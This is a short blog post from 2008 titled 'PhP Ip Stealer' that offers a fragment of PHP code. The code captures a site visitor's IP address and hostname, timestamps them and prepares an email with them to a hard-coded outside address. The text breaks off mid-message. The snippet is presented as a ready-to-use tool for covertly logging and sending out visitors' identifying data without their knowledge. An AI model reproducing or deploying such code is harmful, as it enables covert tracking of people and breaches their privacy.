skip to main
|
skip to sidebar
Saturday, January 19, 2008
PhP Ip Stealer
$ip = $REMOTE_ADDR;
$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "coiz@daulabuci.com";
$sujet = "Ip + Host";
$message = "
Ip : $ip
Host : $host